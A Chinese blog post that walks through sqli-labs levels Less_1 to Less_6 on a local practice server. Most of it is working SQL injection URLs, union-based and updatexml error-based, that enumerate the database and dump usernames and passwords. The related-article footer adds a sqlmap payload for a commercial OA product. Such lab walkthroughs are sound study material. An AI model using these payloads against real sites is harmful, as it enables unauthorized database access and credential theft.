SQL注入漏洞复现

已于 2024-08-06 19:51:54 修改
阅读量631 收藏 7
点赞数 5
文章标签: sql 数据库
于 2024-08-05 22:15:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67019439/article/details/140935111
版权

目录

Less_1

Less_2

 Less_3

 Less_4

Less_5

 Less_6

Less_1

查看所有数据库:

http://127.0.0.1:8081/Less_1/?id = -1' union select 1,2,group_concat(schema_name) from information_schema.schemata--+

 

查看表:

 http://127.0.0.1:8081/Less_1/?id = -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'--+

 查看列名:

http://127.0.0.1:8081/Less-1/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name ='users'--+

 已知库名、表名、列名,现在可以直接查找了

http://127.0.0.1:8081/Less-1/?id=-1'union select 1,2,group_concat(username,0x3a,password) from users --+

Less_2

第二关和第一关差不多,只是闭合点没有闭合

http://127.0.0.1:8081/Less-2/?id=-1 union select 1,2,group_concat(0x7e,username,password)from security.users--+

 Less_3

http://127.0.0.1:8081/Less-3/?id = -1'--+

 可以看到,这里还是报错,说明这里可能不用 ' 闭合,我们尝试用 )进行闭合

http://127.0.0.1:8081/Less-3/?id = -1')--+

 可以看到,成功找到注入点,接下来就和第一关没什么区别了

http://127.0.0.1:8081/Less-3/?id=-1') union select 1,2,group_concat(0x7e,username,password)from security.users--+

 Less_4

http://127.0.0.1:8081/Less-3/?id = 1' order by 4--+

 这里看到order by 4 依然有回显,说明这里可能不是用 ' 闭合,我们尝试 ) ,但是依然有回显

经过尝试,最后发现闭合点为 ")

http://127.0.0.1:8081/Less-3/?id = 1") order by 3--+

 http://127.0.0.1:8081/Less-3/?id = 1") order by 3--+

 可以看到成功找到注入点,那就直接上命令

http://127.0.0.1/Less-4/?id=1") union select 1,2,group_concat(0x7e,username,password)from security.users--+

Less_5
 

 http://127.0.0.1:8081/Less-5/?id = 1

  http://127.0.0.1:8081/Less-5/?id = 1'

可以发现这里注入点在前端显示不出来,所以可以尝试以下报错注入

http://127.0.0.1:8081/Less-5/?id=1'and updatexml(1,concat(0x7e,user(),0x7e),1)--+

可以看到已经显示出来了,然后去拿用户密码

http://127.0.0.1:8081/Less-5/?id=1'and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+

 

但是现在显示不完,所以可以用substr来依次截取就行

http://127.0.0.1:8081/Less-5/?id=1'and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),32,64),0x7e),1)--+

 Less_6

第六关和第五关没什么区别,只是闭合用的 " 

直接上命令:

http://127.0.0.1:8081/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),32,64),0x7e),1)--+

 


 

Zz.555
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ERPNext SQL 注入漏洞复现
0xSec
12-05 935
ERPNext frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
大华监控DSS存在SQL注入高危漏洞
wan___she__pi的博客
03-27 830
大华DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合,实现更加智能、便捷的分级查询服务。大华 DSS 数字监控系统 存在File.action SQL注入,黑客可以利用该漏洞执行任意SQL语句,获取敏感信息,造成危害。
YxtCMF SQL注入 漏洞复现
weixin_51681694的博客
05-03 456
复现的时候被某个实验室写的漏洞文章坑了,插桩插了半天也没见断下来,睡了一觉自己去审才发现那篇文章漏洞点找错了........
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3285
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
畅捷通CRM SQL注入漏洞复现
zzf011900的博客
11-10 197
输入语句验证是否有sql注入
网络安全之SQL注入漏洞复现(中篇)(技术进阶)
weixin_70911257的博客
04-21 1377
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
用友U8 Cloud SQL注入漏洞复现
12-06 465
用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。
DVWA SQL注入漏洞复现
ch258563的博客
04-02 383
DVWA SQL注入漏洞复现
通达OA 11.5 SQL注入漏洞复现
zzf011900的博客
11-10 476
sqlmap 的payload:布尔盲注:link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))link_type=false&slot={}&id=2,用burp抓包。
DVWA-sql注入漏洞复现
qq_68238790的博客
12-04 211
SQL注入漏洞是Web层面最高位的漏洞之一。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入
php168sql注入漏洞
08-15
12. **使用SQLMap工具进一步验证**:通过自动化工具SQLMap来验证是否存在SQL注入漏洞,并尝试获取更多的数据库信息。 #### SQL注入漏洞分析 - **原理**:SQL注入是一种常见的Web安全漏洞,通过向应用程序的输入字段...
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
[数据库][知识]SQL Server、MySQL 和 Oracle 的默认端口和数据库链接
一名不太专业的程序员
08-17 371
请确保在实际使用中,根据您自己的数据库配置(如主机名、端口、数据库名、用户名和密码等)来调整上述连接信息。同时,确保已经添加了相应数据库的 JDBC 驱动到您的项目依赖中。SQL Server、MySQL 和 Oracle 的默认端口号、连接 URL 和驱动类名。请注意,SQL Server 的 JDBC URL 格式可能需要根据实际的数据库实例进行调整,例如,如果数据库实例名称不是默认的。参数用于指定字符集,如果需要其他字符集设置,可能需要调整这些参数。指定了连接的主机和端口,
SQL,将多对多的关联记录按行输出
最新发布
smilejingwei的博客
08-19 247
要求从两张表中找出符合条件W=100,H=500,D=300的记录,先输出Primay里的一行,再输出相关联的Secondary的每一行。A3:A2为空时返回空,A2不为空时,循环A1的每条记录 ~,合并 ~ 和 A2,最后再合并循环的结果。数据库的Primary表和Secondary表有相同的结构,其中W、H、D是主键。A1、A2:执行简单SQL,条件查询。
SQL关键字检测持续优化,太难了
qq_37148232的博客
08-19 265
【代码】SQL关键字检测优化持续优化,太难了。
查询数据库版本、查询数据字符集sql
qq_39564710的博客
08-18 381
查询数据库版本、查询数据字符集sql
eyoucms1.6sql注入漏洞复现
06-09
为了避免漏洞被利用,我不能提供直接的漏洞复现步骤,但我可以告诉您该漏洞的一般性情况和解决方法。 eyoucms 1.6存在多个SQL注入漏洞,攻击者可以利用这些漏洞在系统中执行恶意代码,获取系统权限,窃取敏感信息等。 解决这些漏洞的方法包括: 1. 及时升级eyoucms到最新版本,开发者通常会根据安全漏洞修复进行版本升级。 2. 在使用eyoucms时,严格遵循安全规范,例如不要使用默认的管理员账号和密码,不要将敏感信息存储在公共文件夹中,限制文件上传和下载的类型和大小等。 3. 对于已知的SQL注入漏洞,可以通过修改程序代码或使用安全补丁来修复漏洞。 4. 加强服务器的安全性监控和防御能力,例如安装防火墙、入侵检测系统和安全审计系统等,及时发现并阻止攻击。 如果您怀疑系统已经受到攻击,请立即停止服务器,并进行全面检查和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值